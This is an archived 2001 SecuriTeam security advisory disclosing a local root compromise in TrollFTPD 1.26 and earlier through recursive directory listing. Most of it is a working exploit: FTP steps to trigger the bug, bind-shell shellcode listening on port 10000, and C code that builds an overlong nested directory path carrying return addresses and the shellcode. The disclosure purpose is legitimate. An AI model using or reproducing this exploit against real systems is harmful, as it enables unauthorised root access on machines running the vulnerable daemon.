[UNIX] TrollFTPD Security Vulnerability Leads to Root Compromise

From: support@securiteam.com
Date: 08/15/01 

From: support@securiteam.com
To: list@securiteam.com
Subject: [UNIX] TrollFTPD Security Vulnerability Leads to Root Compromise
Message-Id: <20010815131610.28443138BF@mail.der-keiler.de>
Date: Wed, 15 Aug 2001 15:16:10 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  TrollFTPD Security Vulnerability Leads to Root Compromise
------------------------------------------------------------------------

SUMMARY

 <http://www.trolltech.com/products/download/freebies/ftpd.html>
TrollTech's FTPD, a free publicly available FTP server solution, suffers
from a security vulnerability that allows local attackers to compromise
root privileges (root is usually the user that the TrollTech's FTP daemon
runs under).

DETAILS

Vulnerable systems:
TrollFTPD version 1.26 and prior

Immune systems:
TrollFTPD version 1.27

A vulnerability in the way the TrollFTPD handles recursive directories
allows attackers to cause the product to execute arbitrary commands,
allowing local attackers to gain root privileges.

Exploit:
(The offsets in the exploit below are not guaranteed to work.)

ftp localhost
<in ftp>
(your username)
(your password)
cd /tmp
ls -R

<out of ftp>
Connect to port 10000 with nc

Exploit code:
char shellcode[] =
   
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x31\xdb" // xor ebx, ebx
   "\xf7\xe3" // mul ebx
   "\xb0\x66" // mov al, 102
   "\x53" // push ebx
   "\x43" // inc ebx
   "\x53" // push ebx
   "\x43" // inc ebx
   "\x53" // push ebx
   "\x89\xe1" // mov ecx, esp
   "\x4b" // dec ebx
   "\xcd\x80" // int 80h
   "\x89\xc7" // mov edi, eax
   "\x52" // push edx
   "\x66\x68\x27\x10" // push word 4135
   "\x43" // inc ebx
   "\x66\x53" // push bx
   "\x89\xe1" // mov ecx, esp
   "\xb0\x10" // mov al, 16
   "\x50" // push eax
   "\x51" // push ecx
   "\x57" // push edi
   "\x89\xe1" // mov ecx, esp
   "\xb0\x66" // mov al, 102
   "\xcd\x80" // int 80h
   "\xb0\x66" // mov al, 102
   "\xb3\x04" // mov bl, 4
   "\xcd\x80" // int 80h
   "\x50" // push eax
   "\x50" // push eax
   "\x57" // push edi
   "\x89\xe1" // mov ecx, esp
   "\x43" // inc ebx
   "\xb0\x66" // mov al, 102
   "\xcd\x80" // int 80h
   "\x89\xd9" // mov ecx, ebx
   "\x89\xc3" // mov ebx, eax
   "\xb0\x3f" // mov al, 63
   "\x49" // dec ecx
   "\xcd\x80" // int 80h
   "\x41" // inc ecx
   "\xe2\xf8" // loop lp
   "\x51" // push ecx
   "\x68\x55\x55\x55\x55" // push dword 68732f6eh
   "\x68\x55\x55\x55\x55" // push dword 69622f2fh
   "\x89\xe3" // mov ebx, esp
   "\x51" // push ecx
   "\x53" // push ebx
   "\x89\xe1" // mov ecx, esp
   "\xb0\x0b" // mov al, 11
   "\xcd\x80"; // int 80h

main()
{
 char dir[8000];
 char nir[8000];
 int z0=0,a0=0x080597f8;
 int z1=0,a1=0xbff96450;
 int g;
 strcpy(dir,"/tmp/retroll/");
 mkdir(dir,0777);
 printf("%d\n",strlen(shellcode));
 while(strlen(dir)<4040)
 {
  strcat(dir,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/");
  mkdir(dir,0777);
 }
 // 4048 so far leaving 48 left.
 if(chdir(dir)){perror("chdir");exit(1);}
 printf("%d + ",strlen(dir));
 sprintf(dir,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAA/");
 mkdir(dir,0777);
 system("cp /bin/sh AAAAAAAAAAAAAAAAAAAAAAAAAAAAA/UUUUUUUU");
 sprintf(nir,"%sAAAAAAAAAAAAAAAAAAAAAAAA",dir);
 
sprintf(dir,"%sGGGG=AAAAAAA%sAAAAAAAAAAAA%sCCCC%s",nir,&a0,&a1,shellcode);
 printf("%d = ",strlen(dir));
 mkdir(dir,0777);
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:zen-parse@gmx.net>
zen-parse.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [UNIX] Slrnpull Buffer Overflow (-d Parameter)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A security vulnerability in the slrnpull allows local users to overflow ... code and since the program is setuid root, ...
    (Securiteam)
  • RE: Linux hacked
    ... Subject: Linux hacked ... After you boot up into the OS running from CD, ... >> First let me say I'm a security novice. ... >> been unsuccessful in getting root back. ...
    (Security-Basics)
  • Re: Linux hacked
    ... is to boot your system with a separate ... You can't trust the logs, ... >> First let me say I'm a security novice. ... >> been unsuccessful in getting root back. ...
    (Security-Basics)
  • RE: Linux hacked
    ... Also, what exactly did the history file show, can you paste it into a mail ... > First let me say I'm a security novice. ... > been unsuccessful in getting root back. ... > via ssh but you could su in once logged in as one of three users. ...
    (Security-Basics)
  • Re: [security bulletin] HPSBTU02211 SSRT071326 rev.1 - HP Tru64 UNIX Running the dop command, Lo
    ... HP Software Security Response Team ... UNIX Operating System running the dop command. ... privileges of the root user. ... echo "HP Security bulletin code identification: ...
    (Bugtraq)